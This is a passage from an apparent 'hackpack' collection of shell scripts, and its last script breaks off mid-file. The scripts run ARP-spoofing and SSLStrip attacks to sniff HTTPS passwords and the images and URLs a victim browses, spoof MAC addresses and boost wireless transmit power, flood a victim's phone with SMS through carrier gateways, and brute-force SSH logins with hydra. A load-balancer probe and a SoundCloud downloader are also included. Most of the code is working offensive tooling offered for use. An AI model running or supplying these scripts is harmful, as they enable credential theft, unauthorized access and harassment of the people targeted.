61 |
62 | echo -e "Checking for HTTP-Loadbalancing ["Server"]: "
63 | for ((i=0 ; i< $QUERIES ; i++))
64 | do
65 | printf "HEAD / HTTP/1.0\r\n\r\n" | nc $DOMAIN 80 > .nlog
66 | S=`grep -i "Server:" .nlog | awk -F: '{print $2}'`
67 |
68 | if ! grep "`echo ${S}| cut -b2-`" .log &>/dev/null
69 | then
70 | echo "${S}"
71 | fi
72 | cat .nlog >> .log
73 | done
74 |
75 | NR=`sort .log | uniq | grep -c "Server:"`
76 |
77 | if [ $NR -gt 1 ]
78 | then
79 | echo " FOUND"
80 | METHODS="$METHODS HTTP[Server]"
81 | else
82 | echo " NOT FOUND"
83 | fi
84 | echo
85 | rm .nlog .log
86 |
87 |
88 | echo -e -n "Checking for HTTP-Loadbalancing ["Date"]: "
89 | D4=
90 |
91 | for ((i=0 ; i<$QUERIES ; i++))
92 | do
93 | D=`printf "HEAD / HTTP/1.0\r\n\r\n" | nc $DOMAIN 80 | grep "Date:" | awk '{print $6}'`
94 | printf "$D, "
95 |
96 | Df=$(echo " $D" | sed -e 's/:0/:/g' -e 's/ 0/ /g')
97 | D1=$(echo ${Df} | awk -F: '{print $1}')
98 | D2=$(echo ${Df} | awk -F: '{print $2}')
99 | D3=$(echo ${Df} | awk -F: '{print $3}')
100 |
101 | if [ "$D4" = "" ]; then D4=0; fi
102 |
103 | if [ $[ $D1 * 3600 + $D2 * 60 + $D3 ] -lt $D4 ]
104 | then
105 | echo "FOUND"
106 | METHODS="$METHODS HTTP[Date]"
107 | break;
108 | fi
109 |
110 | D4="$[ $D1 * 3600 + $D2 * 60 + $D3 ]"
111 |
112 | if [ $i -eq $[$QUERIES - 1] ]
113 | then
114 | echo "NOT FOUND"
115 | fi
116 | done
117 |
118 |
119 | echo -e -n "\nChecking for HTTP-Loadbalancing ["Diff"]: "
120 | for ((i=0 ; i<$QUERIES ; i++))
121 | do
122 | printf "HEAD / HTTP/1.0\r\n\r\n" | nc $DOMAIN 80 | grep -v -e "Date:" -e "Set-Cookie" > .nlog
123 |
124 | if ! cmp .log .nlog &>/dev/null && [ -e .log ]
125 | then
126 | echo "FOUND"
127 | diff .log .nlog | grep -e ">" -e "<"
128 | METHODS="$METHODS HTTP[Diff]"
129 | break;
130 | fi
131 |
132 | cp .nlog .log
133 |
134 | if [ $i -eq $[$QUERIES - 1] ]
135 | then
136 | echo "NOT FOUND"
137 | fi
138 | done
139 |
140 | rm .nlog .log
141 |
142 |
143 | if [ "$METHODS" != "" ]
144 | then
145 | echo
146 | echo $DOMAIN does Load-balancing. Found via Methods: $METHODS
147 | echo
148 | else
149 | echo
150 | echo $DOMAIN does NOT use Load-balancing.
151 | echo
152 | fi
153 |
154 |
--------------------------------------------------------------------------------
/hackpack/hackpack/n1tr0g3n_SSL_BT-5.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | echo
3 | echo
4 | echo
5 | echo ".##....##....##...########.########....#####....######....#######..##....##"
6 | echo ".###...##..####......##....##.....##..##...##..##....##..##.....##.###...##"
7 | echo ".####..##....##......##....##.....##.##.....##.##...............##.####..##"
8 | echo ".##.##.##....##......##....########..##.....##.##...####..#######..##.##.##"
9 | echo ".##..####....##......##....##...##...##.....##.##....##.........##.##..####"
10 | echo ".##...###....##......##....##....##...##...##..##....##..##.....##.##...###"
11 | echo ".##....##..######....##....##.....##...#####....######....#######..##....##"
12 | echo
13 | echo " n1tr0g3n's https password sniff3r";
14 | echo " www.n1tr0g3n.com & www.Top-Hat-Sec.com";
15 | echo
16 | echo "This script will attempt to install & update SSLStrip and Dsniff package";
17 | sleep 5
18 | echo
19 | sudo apt-get install sslstrip
20 | sudo apt-get install dsniff
21 | clear
22 | echo
23 | echo
24 | echo
25 | echo
26 | echo
27 | echo "**************************************************************************************************"
28 | echo "This script will create a folder named images on your desktop to save victims images from browser";
29 | echo "**************************************************************************************************"
30 | echo
31 | echo "**************************************************************************************************"
32 | echo "A bunch of Xterm windows will open on top of eachother so just spread them out across your screen";
33 | echo "**************************************************************************************************"
34 | echo
35 | read -p "Press ENTER to continue with the script & begin SSL p0wnag3"
36 | clear
37 | echo
38 | echo
39 | sudo mkdir /root/Desktop/images
40 | echo
41 | echo
42 | #This command will ask you for your interface name
43 | echo
44 | echo "Please type the name of your network interface in below";
45 | read IFACE;
46 | sleep 2
47 | #This will allow you to forward packets from the router
48 | echo
49 | echo
50 | echo "1" > /proc/sys/net/ipv4/ip_forward
51 | echo
52 | echo
53 | echo
54 | #This will start driftnet to capture images on your computer
55 | sudo xterm -e driftnet -i $IFACE -d /root/Desktop/images &
56 | echo
57 | echo
58 | #This will start URLSnarf to show the websites the victim browses
59 | sudo xterm -e urlsnarf -i $IFACE &
60 | echo
61 | echo
62 | #this command will set up all redirection
63 | sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
64 | echo
65 | echo
66 | #This command will start ettercap
67 | sudo xterm -e ettercap -TqM ARP:REMOTE // // &
68 | echo
69 | echo
70 | #This command will start SSLStrip to start sniffing https:// passwords
71 | echo
72 | sudo sslstrip -l 10000 &
73 |
74 |
75 |
76 |
--------------------------------------------------------------------------------
/hackpack/hackpack/readysethack.py:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | # -*- coding: utf-8 -*-
3 | #
4 | # readysethack.py
5 | #
6 | # Copyright 2013 written by: TH3CR4CK3R TOP-HAT-SEC.COM
7 | #
8 | # This program is free software; you can redistribute it and/or modify
9 | # it under the terms of the GNU General Public License as published by
10 | # the Free Software Foundation; either version 2 of the License, or
11 | # (at your option) any later version.
12 | #
13 | # This program is distributed in the hope that it will be useful,
14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | # GNU General Public License for more details.
17 | #
18 | # You should have received a copy of the GNU General Public License
19 | # along with this program; if not, write to the Free Software
20 | # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
21 | # MA 02110-1301, USA.
22 | #
23 | #
24 |
25 | clear
26 | echo ""
27 | echo " **** **** ** *** * * ***** ***** ***** * * ** **** * *"
28 | echo " * * * * * * * * * * * * * * * * * * * "
29 | echo " **** *** **** * * * ***** **** * ***** **** * **"
30 | echo " * * * * * * * * * * * * * * * * * *"
31 | echo " * * **** * * * * * ***** ***** * * * * * **** * *"
32 | echo ""
33 | echo ""
34 | echo ""
35 | echo ""
36 | sleep 2.5
37 | echo " #################################################################"
38 | echo " #################################################################"
39 | echo " ## THIS SCRIPT WILL PUT THE INTERFACE THAT YOU CHOOSE INTO ##"
40 | echo " ## MONITOR MODE. IT WILL THEN FAKE THE MAC FOR BOTH MONITOR ##"
41 | echo " ## MODE AND MANAGED MODE ##"
42 | echo " ## 00:11:22:33:44:55 IS THE DEFAULT MAC ADDRESS USED ##"
43 | echo " #################################################################"
44 | echo " #################################################################"
45 | echo ""
46 | echo ""
47 | echo ""
48 | echo " --------------------------------------------------------"
49 | echo " -----MAKE SURE THAT YOUR WIRELESS CARD IS CONNECTED-----"
50 | echo " --------------------------------------------------------"
51 | echo ""
52 | echo ""
53 | echo ""
54 | echo " **********************************************"
55 | echo " ******PRESS ENTER WHEN READY TO CONTINUE******"
56 | echo " **********************************************"
57 | echo
58 | read ENTER
59 | sleep 1
60 | clear
61 | echo
62 | airmon-ng
63 | echo
64 | echo " WHICH INTERFACE WOULD YOU LIKE TO USE? \c"
65 | read IFACE
66 | sleep 1
67 | clear
68 | echo ""
69 | echo ""
70 | echo " ###########################################################"
71 | echo " ###########################################################"
72 | echo " ## ##"
73 | echo " ## BOOSTING TXPOWER from 20 > 30 on $IFACE ##"
74 | echo " ## ##"
75 | echo " ###########################################################"
76 | echo " ###########################################################"
77 | sleep 3
78 | echo
79 | iw reg set BO
80 | echo
81 | iwconfig wlan0 txpower 30
82 | echo
83 | sleep 1
84 | clear
85 | echo ""
86 | echo ""
87 | echo ""
88 | echo " ##########################################################"
89 | echo " ################ PLEASE SELECT AN OPTION #################"
90 | echo " ##########################################################"
91 | echo " "
92 | echo " OPTION 1 - USE DEFAULT MAC ADDRESS"
93 | echo ""
94 | echo " OPTION 2 - USE CUSTOM MAC ADDRESS"
95 | echo ""
96 | echo " ENTER YOUR CHOICE [1/2]: \c"
97 | read option
98 |
99 |
100 |
101 | if [ $option = "2" ]; then
102 |
103 | echo
104 | echo ""
105 | echo " WHAT MAC ADDRESS WOULD YOU LIKE TO USE: \c"
106 | read MMAC
107 | sleep 0.75
108 | clear
109 | echo ""
110 | echo ""
111 | echo ""
112 | echo " #############################################################"
113 | echo " #############################################################"
114 | echo " ## ##"
115 | echo " ## BRINGING DOWN $IFACE TO CHANGE THE MAC ADDRESS ##"
116 | echo " ## ====SETTING TO: $MMAC ##"
117 | echo " #############################################################"
118 | echo " #############################################################"
119 | sleep 2
120 | echo
121 | ifconfig $IFACE down
122 | sleep 0.25
123 | macchanger -m $MMAC $IFACE
124 | sleep 0.25
125 | clear
126 | echo ""
127 | echo ""
128 | echo ""
129 | echo " ##############################################################"
130 | echo " ##############################################################"
131 | echo " ## ##"
132 | echo " ## BRINGING UP $IFACE..... THIS MAY TAKE A MOMENT ##"
133 | echo " ## ##"
134 | echo " ##############################################################"
135 | echo " ##############################################################"
136 | sleep 2
137 | ifconfig $IFACE up
138 | sleep 1.5
139 | clear
140 | echo ""
141 | echo ""
142 | echo ""
143 | echo " ##############################################################"
144 | echo " ##############################################################"
145 | echo " ## ##"
146 | echo " ## PUTTING $IFACE INTO MONITOR MODE ##"
147 | echo " ## ##"
148 | echo " ##############################################################"
149 | echo " ##############################################################"
150 | sleep 1.5
151 | airmon-ng start $IFACE
152 | sleep 0.5
153 | clear
154 | echo ""
155 | echo ""
156 | echo ""
157 | echo " ##############################################################"
158 | echo " ##############################################################"
159 | echo " ## ##"
160 | echo " ## NOW BRINGING DOWN Mon0 & AND CHANGING THE MAC ADDRESS ##"
161 | echo " ## ----CHANGING TO: $MMAC ##"
162 | echo " ##############################################################"
163 | echo " ##############################################################"
164 | echo ""
165 | echo ""
166 | sleep 2
167 | ifconfig mon0 down
168 | sleep 0.5
169 | echo ""
170 | macchanger -m $MMAC mon0
171 | sleep 0.25
172 | echo ""
173 | ifconfig mon0 up
174 | sleep 0.5
175 | clear
176 | echo ""
177 | echo ""
178 | echo ""
179 | echo " ##############################################################"
180 | echo " ##############################################################"
181 | echo " ## $IFACE HAS BEEN PUT INTO MONITOR MODE ##"
182 | echo " ## THE TXPOWER HAS BEEN SET TO:30 ##"
183 | echo " ## THE MAC ADDRESS OF BOTH $IFACE AND MON0 ##"
184 | echo " ## HAVE BEEN SPOOFED TO: $MMAC ##"
185 | echo " ##############################################################"
186 | echo " ##############################################################"
187 | echo ""
188 | echo ""
189 | echo ""
190 | echo ""
191 | echo ""
192 | echo ""
193 | echo ""
194 | echo " PRESS ENTER TO START HACKING: \c"
195 | read ENTER
196 | sleep 0.5
197 | exit
198 |
199 |
200 | else
201 | if [ $option = "1" ]; then
202 |
203 | clear
204 | echo ""
205 | echo ""
206 | echo ""
207 | echo " #############################################################"
208 | echo " #############################################################"
209 | echo " ## ##"
210 | echo " ## BRINGING DOWN $IFACE TO CHANGE THE MAC ADDRESS ##"
211 | echo " ## ====SETTING TO: 00:11:22:33:44:55 ##"
212 | echo " #############################################################"
213 | echo " #############################################################"
214 | sleep 2
215 | echo
216 | ifconfig $IFACE down
217 | sleep 0.25
218 | echo
219 | macchanger -m 00:11:22:33:44:55 $IFACE
220 | sleep 0.25
221 | clear
222 | echo ""
223 | echo ""
224 | echo ""
225 | echo " ##############################################################"
226 | echo " ##############################################################"
227 | echo " ## ##"
228 | echo " ## BRINGING UP $IFACE..... THIS MAY TAKE A MOMENT ##"
229 | echo " ## ##"
230 | echo " ##############################################################"
231 | echo " ##############################################################"
232 | sleep 2
233 | echo
234 | ifconfig $IFACE up
235 | sleep 1
236 | clear
237 | echo ""
238 | echo ""
239 | echo ""
240 | echo " ##############################################################"
241 | echo " ##############################################################"
242 | echo " ## ##"
243 | echo " ## PUTTING $IFACE INTO MONITOR MODE ##"
244 | echo " ## ##"
245 | echo " ##############################################################"
246 | echo " ##############################################################"
247 | sleep 1.5
248 | airmon-ng start $IFACE
249 | sleep 0.5
250 | clear
251 | echo ""
252 | echo ""
253 | echo ""
254 | echo " ##############################################################"
255 | echo " ##############################################################"
256 | echo " ## ##"
257 | echo " ## NOW BRINGING DOWN Mon0 & AND CHANGING THE MAC ADDRESS ##"
258 | echo " ## ----CHANGING TO: 00:11:22:33:44:55 ##"
259 | echo " ##############################################################"
260 | echo " ##############################################################"
261 | sleep 2
262 | ifconfig mon0 down
263 | sleep 0.5
264 | echo
265 | macchanger -m 00:11:22:33:44:55 mon0
266 | echo
267 | sleep 0.25
268 | ifconfig mon0 up
269 | sleep 0.5
270 | echo
271 | sleep 1
272 | clear
273 | echo ""
274 | echo ""
275 | echo ""
276 | echo " ##############################################################"
277 | echo " ##############################################################"
278 | echo " ## $IFACE HAS BEEN PUT INTO MONITOR MODE ##"
279 | echo " ## THE TXPOWER HAS BEEN SET TO:30 ##"
280 | echo " ## THE MAC ADDRESS OF BOTH $IFACE AND mon0 ##"
281 | echo " ## HAVE BEEN SPOOFED TO: 00:11:22:33:44:55 ##"
282 | echo " ##############################################################"
283 | echo " ##############################################################"
284 | echo ""
285 | echo ""
286 | echo ""
287 | echo ""
288 | echo ""
289 | echo ""
290 | echo ""
291 | echo " PRESS ENTER TO START HACKING: \c"
292 | read ENTER
293 | sleep 0.5
294 | exit
295 |
296 |
297 |
298 | fi
299 | fi
300 |
--------------------------------------------------------------------------------
/hackpack/hackpack/smskiller.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | #########################################################
3 | #########################################################
4 | # SMSKILLER{BOMBER} H4CKN3T VERSION #
5 | # THIS IS FREE SOFTWARE TO USE AND DISTRIBUTE #
6 | INSPIRED BY 2600 WINTER ISSUE #
7 | # WWW.H4CKN3T.COM #
8 | # 11-12-2010 #
9 | #########################################################
10 | #########################################################
11 | # COLORS FOR FUN
12 | red='\e[0;31m'
13 | RED='\e[1;31m'
14 | blue='\e[0;34m'
15 | BLUE='\e[1;34m'
16 | cyan='\e[0;36m'
17 | CYAN='\e[1;36m'
18 | NC='\e[0m' # No CoLOR
19 |
20 |
21 | clear
22 | test "$(whoami)" != 'root' && (echo YOU MUST BE ROOT TO RUN THIS SCRIPT; exit 1)
23 | IP=`ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
24 | if [ -z $IP ]; then
25 | clear;echo;echo;echo " YOU MUST BE CONNECTED TO THE INTERNET TO RUN SCRIPT"
26 | exit 1
27 | fi
28 | echo -e " ${CYAN} #######################################################"
29 | echo " #######################################################"
30 | echo " SMSKILLER "
31 | echo " THE H4CKN3T VERSION - "
32 | echo " THIS IS FREE SOFTWARE TO USE AND DISTRIBUTE "
33 | echo " WWW.H4CKN3T.COM "
34 | echo " 11-12-2010 "
35 | echo " #######################################################"
36 | echo " #######################################################"
37 | sleep 3;echo;
38 | echo
39 | echo -e " ${RED} BY CONTINUING USING THIS SOFTWARE YOU AGREE THAT THIS WAS MADE"
40 | echo " FOR TESTING PURPOSES ONLY, AND YOU ARE RESPONSIBLE FOR YOUR OWN ACTIONS"
41 | sleep 5;clear
42 | echo;echo;echo;
43 | echo -e " ${CYAN} THIS SCRIPT WILL INSTALL MAILUTILS AND SSMTP. (apt-get install mailutils, apt-get install ssmtp)"; sleep 3
44 | ##starting script
45 | echo " ${CYAN} ... CHECKING FOR DEPENDINCIES (MAILUTILS) ..." &
46 | echo;echo
47 |
48 | apt-get install mailutils -y
49 | clear;echo;
50 | echo " NOW INSTALLING SSMTP"
51 | echo;echo;
52 |
53 | apt-get install ssmtp -y
54 | if [ "$?" != 0 ];then
55 | echo " SOMETHING WENT WRONG. CAN'T DOWNLOAD NEEDED FILES"
56 | exit 1
57 | fi
58 |
59 | clear;echo;echo;
60 |
61 | echo -n " ENTER GMAIL ADDRESS TO USE (ex. myemail@gmail.com): "
62 | read AuthUser
63 | echo;echo;
64 | echo -n " ENTER GMAIL ADDRESS PASSWORD (passwd WILL echo to screen): "
65 | read AuthPass
66 | clear;echo;echo;echo " NOW SETTING UP CONFIG FILE WITH DATA"
67 |
68 | echo "AuthUser=$AuthUser" >> /etc/ssmtp/ssmtp.conf
69 | echo "AuthPass=$AuthPass" >> /etc/ssmtp/ssmtp.conf
70 | echo "FromLineOverride=YES" >> /etc/ssmtp/ssmtp.conf
71 | echo "mailhub=smtp.gmail.com:587" >> /etc/ssmtp/ssmtp.conf
72 | echo "useSTARTTLS=YES" >> /etc/ssmtp/ssmtp.conf
73 |
74 | echo " INITIAL SETUP IS COMPLETE .. NOW STARTING ATTACK "
75 | sleep 3
76 | echo -n "ENTER VICTIM'S MOBILE NUMBER: "
77 | read NUM
78 |
79 | echo;echo;
80 |
81 | PS3="Choose (1-5):"
82 | echo ""
83 | echo "CHOOSE A CARRIER BELOW"
84 | echo "<><><><><>"
85 | select CARRIER in ATT BOOST VERIZON VIRGIN ALLTEL
86 | do
87 | break
88 | done
89 |
90 | ATT=@txt.att.net
91 | BOOST=@myboostmobile.com
92 | VERIZON=@vtext.com
93 | VIRGIN=@vmobl.com
94 | ALLTELL=@message.alltel.com
95 |
96 | NUMBER=${NUM}@txt.att.net
97 |
98 | case $CARRIER in
99 | ATT)
100 | NUMBER=${NUM}@txt.att.net
101 | ;;
102 | BOOST)
103 | NUMBER=${NUM}@myboostmobile.com
104 | ;;
105 | VERIZON)
106 | NUMBER=${NUM}@vtext.com
107 | ;;
108 | VIRGIN)
109 | NUMBER=${NUM}@vmobl.com
110 | ;;
111 | ALLTELL)
112 | NUMBER=${NUM}@message.alltel.com
113 | ;;
114 |
115 | *)
116 | ;;
117 | esac
118 | echo;echo;
119 | echo -n " ENTER SUBJECT: "
120 | read SUBJECT
121 | echo;echo;
122 | echo " USING $CARRIER ";sleep 1;echo;echo
123 | echo -n "ENTER A SHORT MESSAGE: "
124 | read MESSAGE
125 |
126 | echo;echo;
127 |
128 | echo -n "ATTACKING $NUMBER ";echo;
129 | echo -n "CONTINUE ... (Y/N): )"
130 | read NEXT
131 |
132 | if [ $NEXT = n ];then
133 | echo "RESTARTING";echo;echo;
134 | ./smskiller.sh
135 | elif [ "$NEXT" = y ];then
136 | echo $MESSAGE > 1.txt
137 | echo "HOW MANY MESSAGE DO YOU WANNA SEND: "
138 | read SMS
139 | echo;echo
140 | echo "NUMBER OF SECONDS BETWEEN MESSAGES: "
141 | read SPEED
142 | COUNTER=0
143 | until [ $SMS -le $COUNTER ];do
144 | cat 1.txt | mail -s "$SUBJECT" $NUMBER
145 | sleep $SPEED
146 | COUNTER=$(( $COUNTER + 1 ))
147 | echo "CTRL + C TO CALL OFF ATTACK ... "
148 | done
149 | fi
150 |
151 |
152 |
153 |
154 |
155 |
--------------------------------------------------------------------------------
/hackpack/hackpack/soundcloud.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #soundcloud music downloader by http://360percents.com
3 | #development: https://github.com/lukapusic/soundcloud-dl/
4 | #Author: Luka Pusic
5 |
6 | echo "[i] soundcloud.com music downloader by http://360percents.com (cURL version)";
7 |
8 | if [ -z "$1" ]; then
9 | echo "";echo "[i] Usage: `basename $0` http://soundcloud.com/link_with_tracks_on_page";echo "";exit
10 | fi
11 |
12 | command -v curl &>/dev/null || { echo "[!] Curl needs to be installed."; exit 1; }
13 |
14 | echo "[i] Grabbing artists page"
15 | page=$(curl -L -s --user-agent 'Mozilla/5.0' $1)
16 | clientID="b45b1aa10f1ac2941910a7f0d10f8e28" #$(echo "$page" | grep "clientID" | tr "," "\n" | grep "clientID" | cut -d '"' -f 4)
17 | #echo "Client id is: $clientID"
18 | artistID=$(echo "$page" | tr "," "\n" | grep "trackOwnerId" | head -n 1 | cut -d ":" -f 2)
19 | #echo "Artist id is: $artistID"
20 | echo "[i] Grabbing all song info"
21 | songs=$(curl -s -L --user-agent 'Mozilla/5.0' "https://api.sndcdn.com/e1/users/$artistID/sounds?limit=256&offset=0&linked_partitioning=1&client_id=$clientID" | tr -d "\n" | sed 's/stream\-item\>/\n/g' | grep "integer")
22 | songcount=$(echo "$songs" | wc -l)
23 | echo "[i] Found $songcount songs!"
24 |
25 | if [ -z "$songs" ]; then
26 | echo "[!] No songs found at $1" && exit
27 | fi
28 |
29 | for (( i=1; i <= $songcount; i++ ))
30 | do
31 | title=$(echo "$songs" | sed -n "$i"p | tr ">" "\n" | grep "" | head -n 1 | cut -d ">" -f 2 | cut -d "<" -f 1)
35 | #echo "Song id is $songID"
36 | url=$(curl -s -L --user-agent 'Mozilla/5.0' "https://api.sndcdn.com/i1/tracks/$songID/streams?client_id=$clientID" | cut -d '"' -f 4 | sed 's/\\u0026/\&/g')
37 | curl -L --user-agent 'Mozilla/5.0' -o "$filename" "$url";
38 | done
39 |
40 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ssh_crack3r.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | clear
3 | echo
4 | # Another one of my simple @ss scripts for all my fellow hackers
5 | echo
6 | echo
7 | echo " +-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+"
8 | echo " |n|1|t|r|0|g|3|n |S|S|H|_|C|r|a|c|k|3|r|"
9 | echo " +-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+"
10 | echo
11 | echo
12 | echo " Created by: n1tr0g3n"
13 |
14 | echo " Website : www.n1tr0g3n.com || www.top-hat-sec.com"
15 | echo
16 | echo " <-----HackMiami.org ----->"
17 | echo
18 | sleep 7
19 | clear
20 | echo
21 | echo
22 | echo
23 | echo
24 | # This command reads the Ip address of the vixtim
25 | echo " Enter the IP address of the connection using SSH you would like to attack Example: 192.168.0.18"
26 | read -e VIP
27 | clear
28 | echo
29 | echo
30 | echo
31 | echo
32 | # This command reads the user name of the victim
33 | echo " Enter the User name of the victim you would like to attack Example: root "
34 | read -e VICTIM
35 | clear
36 | echo
37 | echo
38 | echo
39 | echo
40 | # This command reads the location of the dictionary file you are using for the attack
41 | echo "Enter the loaction of your dictionary file used for this attack Example: /root/Desktop/pass.txt "
42 | read -e DICT
43 | echo
44 | echo
45 | echo
46 | echo
47 | # This is the output of all instructions thrown into hydra to brute force the SSH password
48 | echo
49 | echo
50 | echo
51 | echo " Target is now being attacked biotch!"
52 | echo
53 | echo
54 | echo
55 | echo
56 | hydra -l $VICTIM -P $DICT -t 16 $VIP ssh
57 | echo
58 | echo
59 | echo
60 | # This command is just stupid no use even being here : )
61 | echo " hope you pwn3d someone now get to work!"
62 | sleep 8
63 | echo
64 | echo
65 | echo
66 | echo
67 | exit
68 |
69 |
70 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ssl_phucker.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | clear
3 | # This cript was written by me n1tr0g3n with a lot of input from R4V3N747700 and help from all the guys on the Top-Hat-Sec.com Forum.
4 | #Thanks to TAPE for his input and suggestions which were utilized into the script to make it more functional. And a #special thanks to my lovely girlfriend who puts up with me being on the #computer all the time, I love you with all my #heart. We do this for the security community and hope you guys enjoy our work. Thanks for using the script and we hope #it #works wel #for you.
5 | echo
6 | echo ""
7 | echo ""
8 | echo ""
9 | echo ""
10 | echo ""
11 | echo " n1tr0g3n's all in one Network Sniffer";
12 | echo ""
13 | echo " coded with help by R4V3N747700"
14 | echo ""
15 | echo " www.n1tr0g3n.com & www.Top-Hat-Sec.com";
16 |
17 |
18 | sleep 3
19 | clear
20 | echo ""
21 | echo ""
22 | echo "--------------------------------------------------------------------------------------------------"
23 | echo "A bunch of Xterm windows will open on top of eachother so just spread them out across your screen";
24 | echo "--------------------------------------------------------------------------------------------------"
25 | echo ""
26 | echo " If SSLstrip gives you errors please rerun the script"
27 | echo ""
28 | echo " when done with the attack click ENTER in the ettercap window to cleanup"
29 | echo ""
30 | echo ""
31 | sleep 4
32 | clear
33 |
34 |
35 | #This command will ask you for your interface name
36 | echo
37 | echo "Please type the name of your network interface in below";
38 | read IFACE;
39 | sleep 2
40 | echo ""
41 | echo ""
42 | clear
43 | echo ""
44 | echo " ----------------------------------------------------------------------------------"
45 | echo ""
46 | echo " |-----------------------------------| |-----------------------------------|"
47 | echo " | Attack Entire Gateway | | Attack single host |"
48 | echo " | | | |"
49 | echo " | 1 For LAN attack | | 3 For LAN attack |"
50 | echo " | 2 For Wireless Attack | | 4 For Wireless Attack |"
51 | echo " |-----------------------------------| |-----------------------------------|"
52 | echo ""
53 | echo " ----------------------------------------------------------------------------------"
54 | echo ""
55 | echo ""
56 | echo ""
57 | echo " Select Menu Option: "
58 | read menuoption
59 | if [ $menuoption = "1" ]; then
60 |
61 | echo "This should be your Gateway from what I see: "
62 | route -n | grep 'UG[ \t]' | awk '{print $2}'
63 | echo ""
64 | echo ""
65 | echo "Please type the IP of your Gateway in below";
66 | read GATEWAY;
67 | echo ""
68 | echo ""
69 | echo "Starting attack on Gateway"
70 | route -n | grep 'UG[ \t]' | awk '{print $2}'
71 | sleep 2
72 | #This will allow you to forward packets from the router
73 | echo "1" > /proc/sys/net/ipv4/ip_forward
74 |
75 |
76 | #This will start driftnet to capture images on your computer
77 | sudo xterm -e driftnet -i $IFACE &
78 |
79 |
80 | #This will start URLSnarf to show the websites the victim browses
81 | sudo xterm -e urlsnarf -i $IFACE &
82 |
83 |
84 | #this command will set up all redirection
85 | sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
86 |
87 |
88 | #This command will start ettercap
89 | ettercap -TqM ARP:REMOTE // // &
90 |
91 |
92 | #This command will start SSLStrip to start sniffing https:// passwords
93 | sudo xterm -e sslstrip -a -l 8080 &
94 | echo
95 | echo "Press ENTER to stop session"
96 | read ENTERKEY
97 |
98 | killall sslstrip
99 | killall ettercap
100 | killall urlsnarf
101 | killall xterm
102 | echo "0" > /proc/sys/net/ipv4/ip_forward
103 | iptables --flush
104 | iptables --table nat --flush
105 | iptables --delete-chain
106 | iptables --table nat --delete-chain
107 | else
108 |
109 | if [ $menuoption = "2" ]; then
110 |
111 | #This will allow you to forward packets from the router
112 | echo "This should be your gateway from what I see: "
113 | route -n | grep 'UG[ \t]' | awk '{print $2}'
114 | echo ""
115 | echo ""
116 | echo "Please type the IP of your gateway in below";
117 | read GATEWAY;
118 | echo ""
119 |
120 | echo "Starting attack on gateway"
121 | route -n | grep 'UG[ \t]' | awk '{print $2}'
122 | sleep 2
123 |
124 |
125 | echo "1" > /proc/sys/net/ipv4/ip_forward
126 |
127 |
128 | #This will start driftnet to capture images on your computer
129 | sudo xterm -e driftnet -i $IFACE &
130 |
131 |
132 | #This will start URLSnarf to show the websites the victim browses
133 | sudo xterm -e urlsnarf -i $IFACE &
134 |
135 |
136 | #this command will set up all redirection
137 | sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
138 |
139 |
140 | #This command will start ettercap
141 | ettercap -Tq -i $IFACE -M arp:remote /$GATEWAY/ // &
142 | #sudo xterm -e ettercap -TqM ARP:REMOTE // // & -----> command for LAN
143 |
144 |
145 | #This command will start SSLStrip to start sniffing https:// passwords
146 | sudo xterm -e sslstrip -a -l 8080 &
147 |
148 |
149 | echo "Press ENTER to stop session"
150 | read ENTERKEY
151 |
152 | killall sslstrip
153 | killall ettercap
154 | killall urlsnarf
155 | killall xterm
156 | echo "0" > /proc/sys/net/ipv4/ip_forward
157 | iptables --flush
158 | iptables --table nat --flush
159 | iptables --delete-chain
160 | iptables --table nat --delete-chain
161 | else
162 |
163 | if [ $menuoption = "3" ]; then
164 | #This will allow you to forward packets from the router
165 | echo ""
166 | echo ""
167 | echo "This should be your gateway from what I see: "
168 | route -n | grep 'UG[ \t]' | awk '{print $2}'
169 | echo ""
170 | echo ""
171 | echo "Please type the IP of your gateway in below";
172 | read GATEWAY3;
173 | echo ""
174 | echo ""
175 | echo "Please type the IP of the target host below";
176 | read HOST3;
177 | echo ""
178 | echo ""
179 | echo " Starting Attack on Target Host"
180 | sleep 2
181 |
182 |
183 | echo "1" > /proc/sys/net/ipv4/ip_forward
184 |
185 |
186 | #This will start driftnet to capture images on your computer
187 | sudo xterm -e driftnet -i $IFACE &
188 |
189 |
190 | #This will start URLSnarf to show the websites the victim browses
191 | sudo xterm -e urlsnarf -i $IFACE &
192 |
193 |
194 | #this command will set up all redirection
195 | sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
196 |
197 |
198 | #This command will start ettercap
199 | ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
200 |
201 |
202 | #This command will start SSLStrip to start sniffing https:// passwords
203 | xterm -e sslstrip -a -l 8080 &
204 |
205 | echo "Press ENTER to stop session"
206 | read ENTERKEY
207 |
208 | killall sslstrip
209 | killall ettercap
210 | killall urlsnarf
211 | killall xterm
212 | echo "0" > /proc/sys/net/ipv4/ip_forward
213 | iptables --flush
214 | iptables --table nat --flush
215 | iptables --delete-chain
216 | iptables --table nat --delete-chain
217 | else
218 |
219 | if [ $menuoption = "4" ]; then
220 | #This will allow you to forward packets from the router
221 | echo ""
222 | echo ""
223 | echo "This should be your Gateway from what I see: "
224 | route -n | grep 'UG[ \t]' | awk '{print $2}'
225 | echo ""
226 | echo ""
227 | echo "Please type the IP of your gateway in below";
228 | read GATEWAY4;
229 | echo ""
230 | echo ""
231 | echo "Please type the IP of the target host below";
232 | read HOST4;
233 | echo ""
234 | echo ""
235 | echo " Starting Attack on Target Host"
236 | sleep 2
237 |
238 |
